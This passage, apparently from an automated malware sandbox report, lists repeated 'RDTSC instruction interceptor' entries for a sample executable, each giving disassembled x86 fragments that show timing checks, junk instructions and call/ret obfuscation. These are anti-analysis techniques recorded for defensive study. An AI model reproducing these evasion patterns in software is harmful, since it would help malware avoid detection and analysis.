                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4BAA second address: 7D4BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnp 00007F7290C62CA6h 0x0000000c jns 00007F7290C62CA6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F7290C62CABh 0x0000001b pushad 0x0000001c jmp 00007F7290C62CAFh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E211E second address: 7E2135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F7290766B26h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E2135 second address: 7E2167 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7290C62CA6h 0x00000008 jmp 00007F7290C62CB9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jl 00007F7290C62CB2h 0x00000016 jo 00007F7290C62CACh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1C41 second address: 7E1C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1C47 second address: 7E1C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7290C62CAAh 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F7290C62CA8h 0x00000014 jg 00007F7290C62CB2h 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007F7290C62CA6h 0x00000022 jnl 00007F7290C62CA6h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1C81 second address: 7E1C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1DD8 second address: 7E1DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CB6h 0x00000009 jg 00007F7290C62CA6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1DFF second address: 7E1E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F7290766B37h 0x0000000d js 00007F7290766B28h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1E29 second address: 7E1E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7290C62CA6h 0x0000000a jmp 00007F7290C62CB3h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1E4D second address: 7E1E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E66EC second address: 7E66F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E66F0 second address: 7E66F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E66F4 second address: 7E6700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E6700 second address: 7E6704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E6704 second address: 7E6718 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F7290C62CA6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA5CD second address: 7EA5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA5D2 second address: 7EA5DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7290C62CA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA5DE second address: 7EA5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA753 second address: 7EA757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA757 second address: 7EA767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7290766B26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA767 second address: 7EA778 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F7290C62CA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA778 second address: 7EA77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA8B4 second address: 7EA8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EABCC second address: 7EABD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EABD5 second address: 7EABDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EABDB second address: 7EABE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EABE5 second address: 7EABE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EABE9 second address: 7EAC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B2Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007F7290766B32h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EAC03 second address: 7EAC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EAC09 second address: 7EAC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EC4D9 second address: 7EC4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EC4DD second address: 7EC4E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EC4E3 second address: 7EC4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EC4ED second address: 7EC4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7F8C7A second address: 7F8CAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CAFh 0x00000007 jmp 00007F7290C62CAEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F7290C62CB1h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7F8CAC second address: 7F8D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7290766B2Fh 0x00000008 pop eax 0x00000009 js 00007F7290766B53h 0x0000000f jmp 00007F7290766B38h 0x00000014 jmp 00007F7290766B35h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c pushad 0x0000001d jmp 00007F7290766B2Ah 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6D3E17 second address: 6D3E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EF384 second address: 7EF3A8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290766B26h 0x00000008 jmp 00007F7290766B37h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EF3A8 second address: 7EF3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EF3AD second address: 7EF3CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F7290766B26h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jbe 00007F7290766B28h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jo 00007F7290766B51h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 716C34 second address: 716C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71701A second address: 71701E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71A55A second address: 71A56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F7290766B2Ch 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 720BF2 second address: 720BFC instructions: 0x00000000 rdtsc 0x00000002 js 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 720BFC second address: 720C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F7290C62CB2h 0x00000010 ja 00007F7290C62CACh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 726517 second address: 726521 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 724137 second address: 72414C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 724150 second address: 72415A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 727476 second address: 7274D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F7290C62CB5h 0x0000000b jmp 00007F7290C62CAFh 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 add ebx, 5FC6B88Ah 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F7290C62CA8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 mov dword ptr [ebp+150D23E9h], esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F7290C62CACh 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7285C0 second address: 7285CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 729503 second address: 72950D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72950D second address: 72958E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+150D183Dh], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F7290C62CA8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F7290C62CB0h 0x00000032 push 00000000h 0x00000034 jl 00007F7290C62CABh 0x0000003a mov ebx, 36ACC9E0h 0x0000003f xchg eax, esi 0x00000040 push esi 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 pop edx 0x00000045 pop esi 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 jmp 00007F7290C62CB0h 0x0000004e pop eax 0x0000004f pushad 0x00000050 jmp 00007F7290C62CB7h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72A369 second address: 72A3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F7290766B28h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007F7290766B37h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007F7290766B28h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 jmp 00007F7290766B2Dh 0x00000048 adc edi, 10577C86h 0x0000004e push 00000000h 0x00000050 mov ebx, dword ptr [ebp+150D2495h] 0x00000056 push eax 0x00000057 push edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 72B5B0 second address: 72B633 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7290C62CA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+152619CCh], esi 0x00000011 mov ebx, edx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov edi, 6845E4E5h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov edi, dword ptr [ebp+150D2A46h] 0x0000002c mov eax, dword ptr [ebp+150D0685h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F7290C62CA8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c push FFFFFFFFh 0x0000004e mov edi, dword ptr [ebp+150D1ABBh] 0x00000054 pushad 0x00000055 ja 00007F7290C62CABh 0x0000005b mov eax, dword ptr [ebp+150D1BC2h] 0x00000061 popad 0x00000062 nop 0x00000063 push ecx 0x00000064 push ebx 0x00000065 ja 00007F7290C62CA6h 0x0000006b pop ebx 0x0000006c pop ecx 0x0000006d push eax 0x0000006e pushad 0x0000006f push edi 0x00000070 je 00007F7290C62CA6h 0x00000076 pop edi 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 731C87 second address: 731CA8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290766B2Ch 0x00000008 jnp 00007F7290766B26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7290766B2Dh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 741A0E second address: 741A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7290C62CAAh 0x00000008 jl 00007F7290C62CA6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F7290C62CB5h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74115F second address: 741170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CABh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412CC second address: 7412E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B2Ch 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415BD second address: 7415C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7290C62CA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415CE second address: 7415E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7290C62CACh 0x0000000e jnc 00007F7290C62CA6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415E9 second address: 7415F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7290766B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7470EC second address: 747108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7290766B38h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 747108 second address: 747124 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7290C62CB0h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74DE55 second address: 74DE5F instructions: 0x00000000 rdtsc 0x00000002 js 00007F7290766B32h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74DE5F second address: 74DE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7290C62CA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F7290C62CA6h 0x00000012 jmp 00007F7290C62CB3h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7527FC second address: 75282E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7290766B36h 0x0000000c jmp 00007F7290766B35h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 753372 second address: 753389 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7290C62CA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push ebx 0x0000000f jl 00007F7290C62CA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75339C second address: 7533A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75352C second address: 753566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290C62CB6h 0x0000000b push edi 0x0000000c pushad 0x0000000d jmp 00007F7290C62CAEh 0x00000012 jmp 00007F7290C62CACh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7522A0 second address: 7522AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75B90F second address: 75B92F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CB1h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c js 00007F7290C62CAEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75B93F second address: 75B951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F7290766B26h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75BACE second address: 75BB0A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7290C62CB7h 0x00000008 jmp 00007F7290C62CB3h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F7290C62CA6h 0x00000016 jng 00007F7290C62CA6h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75BC75 second address: 75BC86 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007F7290766B26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75BF01 second address: 75BF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7290C62CB2h 0x0000000b jbe 00007F7290C62CA6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75BF1F second address: 75BF2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F7290766B26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75C520 second address: 75C538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7290766B30h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
